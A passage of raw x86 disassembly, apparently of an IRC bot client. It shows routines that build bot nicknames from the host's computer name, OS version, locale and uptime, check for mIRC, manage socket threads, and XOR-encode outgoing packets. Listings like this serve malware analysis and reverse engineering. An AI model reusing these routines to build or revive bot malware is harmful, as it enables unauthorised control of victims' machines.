and byte ptr [edi+ebx], 0
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_40AB77 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push ecx
and dword ptr [ebp-4], 0
push esi
push edi
mov dword ptr [ebp-8], 100h
call ds:dword_4270B0 ; GetTickCount
push eax
call sub_41C2B8
pop ecx
lea eax, [ebp-8]
mov esi, offset byte_4315F4
push eax
push esi
call ds:dword_4270C8 ; GetComputerNameA
movsx eax, byte_4315F4
push 41h
pop ecx
push 1
pop edx
loc_40AC00: ; CODE XREF: .text:0040AC0B�j
cmp eax, ecx
jnz short loc_40AC07
mov [ebp-4], edx
loc_40AC07: ; CODE XREF: .text:0040AC02�j
inc ecx
cmp ecx, 5Bh
jl short loc_40AC00
push 61h
pop ecx
loc_40AC10: ; CODE XREF: .text:0040AC1B�j
cmp eax, ecx
jnz short loc_40AC17
mov [ebp-4], edx
loc_40AC17: ; CODE XREF: .text:0040AC12�j
inc ecx
cmp ecx, 7Bh
jl short loc_40AC10
mov edi, [ebp+8]
push esi
push 1Ch
push edi
call __snprintf
xor esi, esi
add esp, 0Ch
cmp dword_429098, esi
jle short loc_40AC5C
loc_40AC36: ; CODE XREF: .text:0040AC5A�j
call _rand
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call __snprintf
add esp, 14h
inc esi
cmp esi, dword_429098
jl short loc_40AC36
loc_40AC5C: ; CODE XREF: .text:0040AC34�j
mov eax, edi
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
call ds:dword_4270B0 ; GetTickCount
push eax
call sub_41C2B8
pop ecx
lea eax, [ebp-0Ch]
push 0Ah
push eax
push 7
push 800h
call ds:dword_4270CC ; GetLocaleInfoA
mov edi, [ebp+8]
lea eax, [ebp-0Ch]
push eax
push offset dword_4315F8
push 1Ch
push edi
call __snprintf
xor esi, esi
add esp, 10h
cmp dword_429098, esi
jle short loc_40ACD1
loc_40ACAB: ; CODE XREF: .text:0040ACCF�j
call _rand
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call __snprintf
add esp, 14h
inc esi
cmp esi, dword_429098
jl short loc_40ACAB
loc_40ACD1: ; CODE XREF: .text:0040ACA9�j
mov eax, edi
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 94h
push esi
lea eax, [ebp-94h]
push edi
push eax
mov esi, offset byte_43DB88
mov dword ptr [ebp-94h], 94h
call ds:dword_4270D0 ; GetVersionExA
call ds:dword_4270B0 ; GetTickCount
push eax
call sub_41C2B8
cmp dword ptr [ebp-90h], 4
pop ecx
jnz short loc_40AD5B
cmp dword ptr [ebp-8Ch], 0
jnz short loc_40AD3B
cmp dword ptr [ebp-84h], 1
jnz short loc_40AD2B
mov esi, offset a95 ; "95"
loc_40AD2B: ; CODE XREF: .text:0040AD24�j
cmp dword ptr [ebp-84h], 2
jnz short loc_40AD97
mov esi, offset aNt_0 ; "NT"
jmp short loc_40AD97
; ---------------------------------------------------------------------------
loc_40AD3B: ; CODE XREF: .text:0040AD1B�j
cmp dword ptr [ebp-8Ch], 0Ah
jnz short loc_40AD4B
mov esi, offset a98 ; "98"
jmp short loc_40AD97
; ---------------------------------------------------------------------------
loc_40AD4B: ; CODE XREF: .text:0040AD42�j
cmp dword ptr [ebp-8Ch], 5Ah
jnz short loc_40AD92
mov esi, offset aMe_0 ; "ME"
jmp short loc_40AD97
; ---------------------------------------------------------------------------
loc_40AD5B: ; CODE XREF: .text:0040AD12�j
cmp dword ptr [ebp-90h], 5
jnz short loc_40AD92
cmp dword ptr [ebp-8Ch], 0
jnz short loc_40AD74
mov esi, offset a2k ; "2K"
jmp short loc_40AD97
; ---------------------------------------------------------------------------
loc_40AD74: ; CODE XREF: .text:0040AD6B�j
cmp dword ptr [ebp-8Ch], 1
jnz short loc_40AD84
mov esi, offset aXp ; "XP"
jmp short loc_40AD97
; ---------------------------------------------------------------------------
loc_40AD84: ; CODE XREF: .text:0040AD7B�j
cmp dword ptr [ebp-8Ch], 2
mov esi, offset a2k3 ; "2K3"
jz short loc_40AD97
loc_40AD92: ; CODE XREF: .text:0040AD52�j
; .text:0040AD62�j
mov esi, offset a??? ; "???"
loc_40AD97: ; CODE XREF: .text:0040AD32�j
; .text:0040AD39�j ...
mov edi, [ebp+8]
push esi
push offset aS_0 ; "[%s]|"
push 1Ch
push edi
call __snprintf
xor esi, esi
add esp, 10h
cmp dword_429098, esi
jle short loc_40ADDB
loc_40ADB5: ; CODE XREF: .text:0040ADD9�j
call _rand
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call __snprintf
add esp, 14h
inc esi
cmp esi, dword_429098
jl short loc_40ADB5
loc_40ADDB: ; CODE XREF: .text:0040ADB3�j
mov eax, edi
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40ADE1(char *Dest)
sub_40ADE1 proc near ; CODE XREF: sub_40AE84+5C�p
Source = byte ptr -1Ch
Dest = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
call ds:dword_4270B0 ; GetTickCount
xor edx, edx
mov ecx, 5265C00h
div ecx
push 0
push offset aMirc_0 ; "mIRC"
mov esi, eax
cmp esi, 64h
jbe short loc_40AE30
call dword_4CB9E0 ; FindWindowA
test eax, eax
mov eax, offset aM ; "[M]"
jnz short loc_40AE19
mov eax, offset byte_43DB88
loc_40AE19: ; CODE XREF: sub_40ADE1+31�j
push eax
push esi
push offset aDS ; "[%d]%s"
lea eax, [ebp+Source]
push 1Ch ; Count
push eax ; Dest
call __snprintf
add esp, 14h
jmp short loc_40AE50
; ---------------------------------------------------------------------------
loc_40AE30: ; CODE XREF: sub_40ADE1+22�j
call dword_4CB9E0 ; FindWindowA
test eax, eax
mov eax, offset aM ; "[M]"
jnz short loc_40AE44
mov eax, offset byte_43DB88
loc_40AE44: ; CODE XREF: sub_40ADE1+5C�j
push eax ; Format
lea eax, [ebp+Source]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_40AE50: ; CODE XREF: sub_40ADE1+4D�j
lea eax, [ebp+Source]
push eax ; Str
call _strlen
pop ecx
cmp eax, 2
pop esi
jbe short loc_40AE7F
push 1Ch ; Count
lea eax, [ebp+Source]
push [ebp+Dest] ; Source
push eax ; Dest
call _strncat
lea eax, [ebp+Source]
push 1Ch ; Count
push eax ; Source
push [ebp+Dest] ; Dest
call _strncpy
add esp, 18h
loc_40AE7F: ; CODE XREF: sub_40ADE1+7D�j
mov eax, [ebp+Dest]
leave
retn
sub_40ADE1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40AE84(char *Dest,int,int,char *Str1)
sub_40AE84 proc near ; CODE XREF: sub_4017ED+7F�p
; sub_401955+50�p ...
Dest = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
Str1 = dword ptr 14h
push ebp
mov ebp, esp
push esi
push edi
xor edi, edi
mov esi, offset dword_42D91C
loc_40AE90: ; CODE XREF: sub_40AE84+3F�j
cmp [ebp+Str1], 0
jz short loc_40AEAB
lea eax, [esi-0Ch]
push eax ; Str2
push [ebp+Str1] ; Str1
call _strcmp
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_40AEB5
; ---------------------------------------------------------------------------
loc_40AEAB: ; CODE XREF: sub_40AE84+10�j
mov ecx, [esi]
xor eax, eax
cmp ecx, [ebp+arg_4]
setz al
loc_40AEB5: ; CODE XREF: sub_40AE84+25�j
test eax, eax
jnz short loc_40AEC7
add esi, 14h
inc edi
cmp esi, offset off_42D9A8
jb short loc_40AE90
jmp short loc_40AED5
; ---------------------------------------------------------------------------
loc_40AEC7: ; CODE XREF: sub_40AE84+33�j
push [ebp+Dest] ; Dest
lea eax, [edi+edi*4]
call off_42D920[eax*4]
pop ecx
loc_40AED5: ; CODE XREF: sub_40AE84+41�j
cmp [ebp+arg_8], 0
pop edi
pop esi
jz short loc_40AEE8
push [ebp+Dest] ; Dest
call sub_40ADE1
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40AEE8: ; CODE XREF: sub_40AE84+57�j
mov eax, [ebp+Dest]
pop ebp
retn
sub_40AE84 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0B8h
push ebx
push esi
lea eax, [ebp-0B8h]
push edi
push eax
mov edi, offset byte_43DB88
mov dword ptr [ebp-0B8h], 94h
call ds:dword_4270D0 ; GetVersionExA
cmp dword ptr [ebp-0B4h], 4
push 0Ah
pop ebx
jnz short loc_40AF67
cmp dword ptr [ebp-0B0h], 0
jnz short loc_40AF48
cmp dword ptr [ebp-0A8h], 1
jnz short loc_40AF38
mov edi, offset a95 ; "95"
loc_40AF38: ; CODE XREF: .text:0040AF31�j
cmp dword ptr [ebp-0A8h], 2
jnz short loc_40AFA3
mov edi, offset aNt_0 ; "NT"
jmp short loc_40AFA3
; ---------------------------------------------------------------------------
loc_40AF48: ; CODE XREF: .text:0040AF28�j
cmp [ebp-0B0h], ebx
jnz short loc_40AF57
mov edi, offset a98 ; "98"
jmp short loc_40AFA3
; ---------------------------------------------------------------------------
loc_40AF57: ; CODE XREF: .text:0040AF4E�j
cmp dword ptr [ebp-0B0h], 5Ah
jnz short loc_40AF9E
mov edi, offset aMe_0 ; "ME"
jmp short loc_40AFA3
; ---------------------------------------------------------------------------
loc_40AF67: ; CODE XREF: .text:0040AF1F�j
cmp dword ptr [ebp-0B4h], 5
jnz short loc_40AF9E
cmp dword ptr [ebp-0B0h], 0
jnz short loc_40AF80
mov edi, offset a2k ; "2K"
jmp short loc_40AFA3
; ---------------------------------------------------------------------------
loc_40AF80: ; CODE XREF: .text:0040AF77�j
cmp dword ptr [ebp-0B0h], 1
jnz short loc_40AF90
mov edi, offset aXp ; "XP"
jmp short loc_40AFA3
; ---------------------------------------------------------------------------
loc_40AF90: ; CODE XREF: .text:0040AF87�j
cmp dword ptr [ebp-0B0h], 2
mov edi, offset dword_431684
jz short loc_40AFA3
loc_40AF9E: ; CODE XREF: .text:0040AF5E�j
; .text:0040AF6E�j
mov edi, offset dword_431680
loc_40AFA3: ; CODE XREF: .text:0040AF3F�j
; .text:0040AF46�j ...
lea eax, [ebp-0A4h]
push offset word_4CB88C
push eax
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40AFC1
mov esi, offset dword_43167C
jmp short loc_40B03C
; ---------------------------------------------------------------------------
loc_40AFC1: ; CODE XREF: .text:0040AFB8�j
lea eax, [ebp-0A4h]
push offset a1 ; "1"
push eax
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_40AFDF
mov esi, offset dword_431678
jmp short loc_40B03C
; ---------------------------------------------------------------------------
loc_40AFDF: ; CODE XREF: .text:0040AFD6�j
lea eax, [ebp-0A4h]
push offset dword_431674
push eax
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_40AFFD
mov esi, offset dword_431670
jmp short loc_40B03C
; ---------------------------------------------------------------------------
loc_40AFFD: ; CODE XREF: .text:0040AFF4�j
lea eax, [ebp-0A4h]
push offset dword_43166C
push eax
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_40B01B
mov esi, offset dword_431668
jmp short loc_40B03C
; ---------------------------------------------------------------------------
loc_40B01B: ; CODE XREF: .text:0040B012�j
lea eax, [ebp-0A4h]
push offset dword_431664
push eax
call _strstr
pop ecx
mov esi, offset dword_431660
test eax, eax
pop ecx
jnz short loc_40B03C
mov esi, offset off_43165C
loc_40B03C: ; CODE XREF: .text:0040AFBF�j
; .text:0040AFDD�j ...
lea eax, [ebp-0Ch]
or dword ptr [ebp-4], 0FFFFFFFFh
push eax
or dword ptr [ebp-8], 0FFFFFFFFh
or dword ptr [ebp-0Ch], 0FFFFFFFFh
lea eax, [ebp-8]
push eax
lea eax, [ebp-4]
push eax
push offset aDdDhDm ; "%dd %dh %dm"
push 0
call sub_41ADD8
pop ecx
push eax
call _sscanf
mov eax, [ebp-4]
add esp, 14h
cmp eax, ebx
jge short loc_40B086
push eax
push offset a0D ; "0%d"
lea eax, [ebp-18h]
push ebx
push eax
call __snprintf
add esp, 10h
jmp short loc_40B0AA
; ---------------------------------------------------------------------------
loc_40B086: ; CODE XREF: .text:0040B06F�j
cmp eax, 64h
jge short loc_40B098
lea ecx, [ebp-18h]
push ebx
push ecx
push eax
call __itoa
jmp short loc_40B0A7
; ---------------------------------------------------------------------------
loc_40B098: ; CODE XREF: .text:0040B089�j
push offset a99 ; "99"
lea eax, [ebp-18h]
push ebx
push eax
call __snprintf
loc_40B0A7: ; CODE XREF: .text:0040B096�j
add esp, 0Ch
loc_40B0AA: ; CODE XREF: .text:0040B084�j
call ds:dword_4270B0 ; GetTickCount
push eax
call sub_41C2B8
pop ecx
lea eax, [ebp-24h]
push ebx
push eax
push 7
push 800h
call ds:dword_4270CC ; GetLocaleInfoA
lea eax, [ebp-18h]
push eax
push esi
lea eax, [ebp-24h]
push edi
mov edi, [ebp+8]
push eax
push offset aSSSS_0 ; "%s|%s|%s|%s|"
push 1Ch
push edi
call __snprintf
xor esi, esi
add esp, 1Ch
cmp dword_429098, esi
jle short loc_40B115
loc_40B0F0: ; CODE XREF: .text:0040B113�j
call _rand
cdq
mov ecx, ebx
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call __snprintf
add esp, 14h
inc esi
cmp esi, dword_429098
jl short loc_40B0F0
loc_40B115: ; CODE XREF: .text:0040B0EE�j
mov eax, edi
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40B11C(char *Str,int)
sub_40B11C proc near ; CODE XREF: sub_40B13C+A�p
; sub_40B214+8�p ...
Str = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+Str] ; Str
call _strlen
push [esp+8+arg_4] ; Str
mov esi, eax
call _strlen
pop ecx
lea eax, [esi+eax*2+0C1h]
pop ecx
pop esi
retn
sub_40B11C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40B13C(void *Dst,int,char *Src,int)
sub_40B13C proc near ; CODE XREF: sub_40B22B+49�p
var_4 = dword ptr -4
Dst = dword ptr 8
arg_4 = dword ptr 0Ch
Src = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_C] ; int
push [ebp+Src] ; Str
call sub_40B11C
cmp eax, [ebp+arg_4]
pop ecx
pop ecx
mov [ebp+var_4], eax
jbe short loc_40B159
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_40B159: ; CODE XREF: sub_40B13C+17�j
push ebx
push esi
push edi
push [ebp+Src] ; Str
call _strlen
push [ebp+arg_C] ; Str
mov esi, eax
call _strlen
mov edi, eax
mov ebx, [ebp+Dst]
push 0FFFFFFEDh
lea eax, [edi+esi+12h]
mov dword_43171C, eax
lea eax, [edi+1]
mov dword_43173D, eax
lea eax, [edi+17h]
mov dword_431735, eax
pop eax
push 74h ; Size
sub eax, edi
push offset dword_4316B8 ; Src
push ebx ; Dst
mov dword_43174B, eax
call _memcpy
push esi ; Size
lea eax, [ebx+74h]
push [ebp+Src] ; Src
push eax ; Dst
call _memcpy
add esi, 74h
push 5 ; Size
push offset aGet ; " get "
lea eax, [esi+ebx]
push eax ; Dst
call _memcpy
add esi, 5
push edi ; Size
push [ebp+arg_C] ; Src
lea eax, [esi+ebx]
push eax ; Dst
call _memcpy
add esi, edi
push 10h ; Size
push (offset aGet+5) ; Src
lea eax, [esi+ebx]
push eax ; Dst
call _memcpy
add esp, 44h
add esi, 10h
push edi ; Size
lea eax, [esi+ebx]
push [ebp+arg_C] ; Src
push eax ; Dst
call _memcpy
add esi, edi
push 38h ; Size
add esi, ebx
push offset byte_431741 ; Src
push esi ; Dst
call _memcpy
mov eax, [ebp+var_4]
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_40B13C endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40B214(char *Str,int)
sub_40B214 proc near ; CODE XREF: sub_40B22B+D�p
Str = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4] ; int
push [esp+4+Str] ; Str
call sub_40B11C
push eax
call sub_40B298
add esp, 0Ch
retn
sub_40B214 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40B22B(void *Dst,int,char *Str,int)
sub_40B22B proc near ; CODE XREF: sub_40DCF9+32�p
Dst = dword ptr 8
arg_4 = dword ptr 0Ch
Src = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+Src]
push edi
mov edi, [ebp+arg_C]
push edi ; int
push ebx ; Str
call sub_40B214
cmp eax, [ebp+arg_4]
pop ecx
pop ecx
ja short loc_40B24B
cmp eax, 0FFFFh
jbe short loc_40B24F
loc_40B24B: ; CODE XREF: sub_40B22B+17�j
xor eax, eax
jmp short loc_40B294
; ---------------------------------------------------------------------------
loc_40B24F: ; CODE XREF: sub_40B22B+1E�j
push esi
push edi ; int
push ebx ; Str
call sub_40B11C
add eax, 101h
push eax ; Size
call _malloc
add esp, 0Ch
mov esi, eax
push edi ; int
push ebx ; Src
push edi ; int
push ebx ; Str
call sub_40B11C
pop ecx
pop ecx
push eax ; int
push esi ; Dst
call sub_40B13C
push eax ; int
push esi ; int
push [ebp+arg_4] ; int
push [ebp+Dst] ; Dst
call sub_40B2B3
push esi
mov edi, eax
call sub_41BA91
add esp, 24h
mov eax, edi
pop esi
loc_40B294: ; CODE XREF: sub_40B22B+22�j
pop edi
pop ebx
pop ebp
retn
sub_40B22B endp
; =============== S U B R O U T I N E =======================================
sub_40B298 proc near ; CODE XREF: sub_40B214+E�p
; sub_40B2B3+4A�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test cl, cl
jnz short loc_40B2A1
inc ecx
loc_40B2A1: ; CODE XREF: sub_40B298+6�j
mov eax, 0FFh
cmp eax, ecx
sbb eax, eax
and eax, 2
add eax, 15h
add eax, ecx
retn
sub_40B298 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40B2B3(void *Dst,int,int,int)
sub_40B2B3 proc near ; CODE XREF: sub_40B22B+56�p
var_4 = dword ptr -4
Dst = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
cmp byte ptr [ebp+arg_C], 0Ah
jz short loc_40B2CF
cmp byte ptr [ebp+arg_C], 0Dh
jz short loc_40B2CF
cmp byte ptr [ebp+arg_C], 5Ch
jz short loc_40B2CF
cmp byte ptr [ebp+arg_C], 0
jnz short loc_40B2D2
loc_40B2CF: ; CODE XREF: sub_40B2B3+8�j
; sub_40B2B3+E�j ...
inc [ebp+arg_C]
loc_40B2D2: ; CODE XREF: sub_40B2B3+1A�j
push esi
mov esi, 0FFh
cmp [ebp+arg_C], esi
jbe short loc_40B2FA
mov eax, [ebp+arg_C]
shr eax, 8
cmp al, 0Ah
jz short loc_40B2F3
cmp al, 0Dh
jz short loc_40B2F3
cmp al, 5Ch
jz short loc_40B2F3
test al, al
jnz short loc_40B2FA
loc_40B2F3: ; CODE XREF: sub_40B2B3+32�j
; sub_40B2B3+36�j ...
add [ebp+arg_C], 100h
loc_40B2FA: ; CODE XREF: sub_40B2B3+28�j
; sub_40B2B3+3E�j
push [ebp+arg_C]
call sub_40B298
cmp eax, [ebp+arg_4]
pop ecx
mov [ebp+var_4], eax
ja short loc_40B312
cmp eax, 0FFFFh
jbe short loc_40B319
loc_40B312: ; CODE XREF: sub_40B2B3+56�j
xor eax, eax
jmp loc_40B3B7
; ---------------------------------------------------------------------------
loc_40B319: ; CODE XREF: sub_40B2B3+5D�j
mov ecx, [ebp+arg_C]
push ebx
mov bl, byte_4CBB18
xor edx, edx
push edi
mov edi, [ebp+arg_8]
test ecx, ecx
jbe short loc_40B349
loc_40B32D: ; CODE XREF: sub_40B2B3+94�j
mov al, [edx+edi]
xor al, bl
jz short loc_40B340
cmp al, 0Ah
jz short loc_40B340
cmp al, 0Dh
jz short loc_40B340
cmp al, 5Ch
jnz short loc_40B344
loc_40B340: ; CODE XREF: sub_40B2B3+7F�j
; sub_40B2B3+83�j ...
inc bl
xor edx, edx
loc_40B344: ; CODE XREF: sub_40B2B3+8B�j
inc edx
cmp edx, ecx
jb short loc_40B32D
loc_40B349: ; CODE XREF: sub_40B2B3+78�j
cmp ecx, esi
mov byte_4CBB18, bl
ja short loc_40B375
push 15h ; Size
push offset dword_4316A0 ; Src
push [ebp+Dst] ; Dst
mov byte_4316AD, cl
mov byte_4316B1, bl
call _memcpy
add esp, 0Ch
push 15h
jmp short loc_40B396
; ---------------------------------------------------------------------------
loc_40B375: ; CODE XREF: sub_40B2B3+9E�j
push 17h ; Size
push offset dword_431688 ; Src
push [ebp+Dst] ; Dst
mov word_431696, cx
mov byte_43169B, bl
call _memcpy
add esp, 0Ch
push 17h
loc_40B396: ; CODE XREF: sub_40B2B3+C0�j
xor eax, eax
pop ecx
cmp [ebp+arg_C], eax
jbe short loc_40B3B2
mov edx, [ebp+Dst]
lea esi, [ecx+edx]
loc_40B3A4: ; CODE XREF: sub_40B2B3+FD�j
mov cl, [eax+edi]
xor cl, bl
mov [esi+eax], cl
inc eax
cmp eax, [ebp+arg_C]
jb short loc_40B3A4
loc_40B3B2: ; CODE XREF: sub_40B2B3+E9�j
mov eax, [ebp+var_4]
pop edi
pop ebx
loc_40B3B7: ; CODE XREF: sub_40B2B3+61�j
pop esi
leave
retn
sub_40B2B3 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40B3BA(char *Source,int,int)
sub_40B3BA proc near ; CODE XREF: WinMain(x,x,x,x)+378�p
; WinMain(x,x,x,x)+3B7�p ...
Source = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
xor edi, edi
mov eax, offset dword_43E710
loc_40B3C2: ; CODE XREF: sub_40B3BA+18�j
cmp byte ptr [eax], 0
jz short loc_40B3D6
add eax, 234h
inc edi
cmp eax, offset dword_4CB710
jl short loc_40B3C2
jmp short loc_40B421
; ---------------------------------------------------------------------------
loc_40B3D6: ; CODE XREF: sub_40B3BA+B�j
push esi
mov esi, edi
imul esi, 234h
push 1FFh ; Count
push [esp+0Ch+Source] ; Source
lea eax, dword_43E710[esi]
push eax ; Dest
call _strncpy
mov eax, [esp+14h+arg_4]
add esp, 0Ch
mov dword_43E910[esi], eax
and dword_43E914[esi], 0
mov eax, [esp+8+arg_8]
and dword_43E918[esi], 0
mov dword_43E91C[esi], eax
and byte_43E928[esi], 0
pop esi
loc_40B421: ; CODE XREF: sub_40B3BA+1A�j
mov eax, edi
pop edi
retn
sub_40B3BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B425 proc near ; DATA XREF: sub_401ACD+2946�o
var_98 = dword ptr -98h
Str = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 98h
mov eax, [ebp+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+var_98]
rep movsd
push [ebp+var_10] ; int
mov dword ptr [eax+94h], 1
lea eax, [ebp+Str]
push [ebp+var_C] ; int
push eax ; Str
push [ebp+var_98] ; int
call sub_40B477
push [ebp+var_14]
call sub_40B6D6
add esp, 14h
push 0
call ds:dword_4270D4 ; ExitThread
pop edi
pop esi
sub_40B425 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40B477(int,char *Str,int,int)
sub_40B477 proc near ; CODE XREF: sub_40B425+38�p
Dest = byte ptr -200h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
push 0 ; int
push [ebp+arg_8] ; int
push offset dword_43177C ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409869
add esp, 14h
xor edi, edi
mov esi, offset dword_43E710
loc_40B4A1: ; CODE XREF: sub_40B477+78�j
cmp byte ptr [esi], 0
jz short loc_40B4E2
cmp [ebp+arg_C], 0
jnz short loc_40B4B5
cmp dword ptr [esi+204h], 0
jnz short loc_40B4E2
loc_40B4B5: ; CODE XREF: sub_40B477+33�j
push esi
push edi
lea eax, [ebp+Dest]
push offset aD_S ; "%d. %s"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409869
add esp, 24h
loc_40B4E2: ; CODE XREF: sub_40B477+2D�j
; sub_40B477+3C�j
add esi, 234h
inc edi
cmp esi, offset dword_4CB710
jl short loc_40B4A1
pop edi
pop esi
leave
retn
sub_40B477 endp
; =============== S U B R O U T I N E =======================================
sub_40B4F5 proc near ; CODE XREF: sub_401ACD+79AA�p
; sub_40B583+12�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
xor ebx, ebx
xor ebp, ebp
cmp esi, ebx
jle short loc_40B57D
cmp esi, 400h
jge short loc_40B57D
imul esi, 234h
push edi
push ebx
push dword_43E924[esi]
lea edi, dword_43E924[esi]
call ds:dword_4270B4 ; TerminateThread
cmp [edi], ebx
jz short loc_40B52D
push 1
pop ebp
loc_40B52D: ; CODE XREF: sub_40B4F5+33�j
mov [edi], ebx
lea edi, dword_43E918[esi]
mov dword_43E910[esi], ebx
mov dword_43E914[esi], ebx
mov eax, [edi]
cmp eax, ebx
jbe short loc_40B54E
push eax
call sub_419F16
pop ecx
loc_40B54E: ; CODE XREF: sub_40B4F5+50�j
mov [edi], ebx
lea edi, dword_43E91C[esi]
mov byte ptr dword_43E710[esi], bl
mov byte_43E928[esi], bl
push dword ptr [edi]
call dword_4CBA6C ; closesocket
lea esi, dword_43E920[esi]
mov [edi], ebx
push dword ptr [esi]
call dword_4CBA6C ; closesocket
mov [esi], ebx
pop edi
loc_40B57D: ; CODE XREF: sub_40B4F5+D�j
; sub_40B4F5+15�j
mov eax, ebp
pop esi
pop ebp
pop ebx
retn
sub_40B4F5 endp
; =============== S U B R O U T I N E =======================================
sub_40B583 proc near ; CODE XREF: sub_40111D+18�p
; WinMain(x,x,x,x):loc_4017D9�p ...
push ebx
push esi
push edi
xor ebx, ebx
xor edi, edi
mov esi, offset dword_43E710
loc_40B58F: ; CODE XREF: sub_40B583+2A�j
cmp byte ptr [esi], 0
jz short loc_40B5A0
push edi
call sub_40B4F5
test eax, eax
pop ecx
jz short loc_40B5A0
inc ebx
loc_40B5A0: ; CODE XREF: sub_40B583+F�j
; sub_40B583+1A�j
add esi, 234h
inc edi
cmp esi, offset dword_4CB710
jl short loc_40B58F
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_40B583 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B5B5 proc near ; CODE XREF: sub_401ACD+41B2�p
; sub_401ACD+4302�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
xor ebx, ebx
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], ebx
mov esi, offset dword_43E914
loc_40B5C9: ; CODE XREF: sub_40B5B5+43�j
mov eax, [esi-4]
cmp eax, [ebp+arg_0]
jnz short loc_40B5EB
test edi, edi
jle short loc_40B5DD
cmp [esi], edi
jz short loc_40B5DD
cmp ebx, edi
jnz short loc_40B5EB
loc_40B5DD: ; CODE XREF: sub_40B5B5+1E�j
; sub_40B5B5+22�j
push ebx
call sub_40B4F5
test eax, eax
pop ecx
jz short loc_40B5EB
inc [ebp+var_4]
loc_40B5EB: ; CODE XREF: sub_40B5B5+1A�j
; sub_40B5B5+26�j ...
add esi, 234h
inc ebx
cmp esi, offset dword_4CB914
jl short loc_40B5C9
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_40B5B5 endp
; =============== S U B R O U T I N E =======================================
sub_40B602 proc near ; CODE XREF: WinMain(x,x,x,x)+40F�p
; sub_401ACD+95E�p ...
arg_0 = dword ptr 4
xor eax, eax
mov ecx, offset dword_43E910
loc_40B609: ; CODE XREF: sub_40B602+1C�j
mov edx, [ecx]
cmp edx, [esp+arg_0]
jnz short loc_40B612
inc eax
loc_40B612: ; CODE XREF: sub_40B602+D�j
add ecx, 234h
cmp ecx, offset dword_4CB910
jl short loc_40B609
retn
sub_40B602 endp
; =============== S U B R O U T I N E =======================================
sub_40B621 proc near ; CODE XREF: sub_401ACD+23D9�p
arg_0 = dword ptr 4
xor eax, eax
push esi
xor edx, edx
mov ecx, offset dword_43E910
loc_40B62B: ; CODE XREF: sub_40B621+1F�j
mov esi, [ecx]
cmp esi, [esp+4+arg_0]
jz short loc_40B644
add ecx, 234h
inc edx
cmp ecx, offset dword_4CB910
jl short loc_40B62B
pop esi
retn
; ---------------------------------------------------------------------------
loc_40B644: ; CODE XREF: sub_40B621+10�j
mov eax, edx
pop esi
retn
sub_40B621 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40B648(int,int,int,int,int,int,int,char *Str)
